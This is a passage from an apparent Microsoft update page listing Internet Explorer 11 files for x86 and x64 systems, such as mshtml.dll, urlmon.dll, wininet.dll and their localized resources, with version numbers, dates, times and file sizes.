2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:11| 333,312 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19846| 23-Sep-2020| 20:01| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 19:49| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:35| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:32| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:17| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:25| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 1,569,280 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 